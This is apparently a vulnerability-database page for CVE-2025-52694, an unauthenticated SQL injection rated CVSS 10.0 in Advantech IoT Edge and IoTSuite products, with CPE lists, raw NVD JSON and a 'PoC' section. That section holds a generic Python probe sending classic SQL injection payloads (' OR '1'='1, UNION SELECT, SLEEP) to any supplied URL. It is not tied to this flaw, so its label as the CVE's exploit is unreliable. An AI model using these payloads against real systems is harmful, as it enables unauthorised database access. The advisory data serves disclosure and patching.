Security Vulnerability Report
中文
CVE-2025-52694 CVSS 10.0 CRITICAL

CVE-2025-52694

Published: 2026-01-12 03:16:07
Last Modified: 2026-01-26 03:15:49
Source: 5f57b9bf-260d-4433-bf07-b6a79e9bb7d4

Description

Successful exploitation of the SQL injection vulnerability could allow an unauthenticated remote attacker to execute arbitrary SQL commands on the vulnerable service when it is exposed to the Internet, potentially affecting data confidentiality, integrity, and availability. Users and administrators of affected product versions are advised to update to the latest versions immediately.

CVSS Details

CVSS Score
10.0
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:advantech:iot_edge_linux_docker:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:advantech:iot_edge_windows:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:advantech:iotsuite_growth_linux_docker:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:advantech:iotsuite_saas_composer:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:advantech:iotsuite_starter_linux_docker:*:*:*:*:*:*:*:* - VULNERABLE
受影响产品所有版本(具体版本信息需查阅官方公告)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-52694 SQL Injection PoC # Target: Vulnerable service with SQL injection # Note: Replace TARGET_URL and PARAMETER with actual values import requests import sys def test_sql_injection(url, param_name): """Test for SQL injection vulnerability""" payloads = [ "' OR '1'='1", "' OR '1'='1' --", "' OR '1'='1' /*", "admin' --", "' UNION SELECT NULL--", "' AND SLEEP(5)--" ] headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)', 'Content-Type': 'application/x-www-form-urlencoded' } print(f"[*] Testing SQL injection on {url}") print(f"[*] Parameter: {param_name}") for payload in payloads: data = {param_name: payload} try: response = requests.post(url, data=data, headers=headers, timeout=10) if 'error' not in response.text.lower() and response.status_code == 200: print(f"[+] Potential vulnerability found with payload: {payload}") return True except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") print("[-] No obvious SQL injection detected") return False if __name__ == "__main__": if len(sys.argv) < 3: print(f"Usage: python {sys.argv[0]} <URL> <PARAMETER>") sys.exit(1) test_sql_injection(sys.argv[1], sys.argv[2])

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-52694", "sourceIdentifier": "5f57b9bf-260d-4433-bf07-b6a79e9bb7d4", "published": "2026-01-12T03:16:07.127", "lastModified": "2026-01-26T03:15:49.177", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Successful exploitation of the SQL injection vulnerability could allow an unauthenticated remote attacker to execute arbitrary SQL commands on the vulnerable service when it is exposed to the Internet, potentially affecting data confidentiality, integrity, and availability. Users and administrators of affected product versions are advised to update to the latest versions immediately."}, {"lang": "es", "value": "El éxito en la explotación de la vulnerabilidad de inyección SQL podría permitir a un atacante remoto no autenticado ejecutar comandos SQL arbitrarios en el servicio vulnerable cuando este está expuesto a Internet, lo que podría afectar la confidencialidad, integridad y disponibilidad de los datos. Se recomienda a los usuarios y administradores de las versiones de productos afectadas que actualicen a las últimas versiones de inmediato."}], "metrics": {"cvssMetricV31": [{"source": "5f57b9bf-260d-4433-bf07-b6a79e9bb7d4", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "baseScore": 10.0, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 6.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:advantech:iot_edge_linux_docker:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.0.2", "matchCriteriaId": "4159F16F-DB7D-4D05-A929-F36F7881DADC"}, {"vulnerable": true, "criteria": "cpe:2.3:a:advantech:iot_edge_windows:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.0.2", "matchCriteriaId": "BB4631FE-DC5B-45F6-83B2-7747FFB52191"}, {"vulnerable": true, "criteria": "cpe:2.3:a:advantech:iotsuite_growth_linux_docker:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.0.2", "matchCriteriaId": "A072360E-AD26-44B5-A5BB-F3F3E3489964"}, {"vulnerable": true, "criteria": "cpe:2.3:a:advantech:iotsuite_saas_composer:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.4.15", "matchCriteriaId": "A4BD0911-E8D5-4E1A-BFA4-872A9F62E621"}, {"vulnerable": true, "criteria": "cpe:2.3:a:advantech:iotsuite_starter_linux_docker:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.0.2", "matchCriteriaId": "1B3D90FA-A9D9-4C66-9C28-34E600C984ED"}]}]}], "references": [{"url": "https://www.csa.gov.sg/alerts-and-advisories/alerts/alerts-al-2026-001/", "source": "5f57b9bf-260d-4433-bf07-b6a79e9bb7d4", "tags": ["Mitigation", "Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.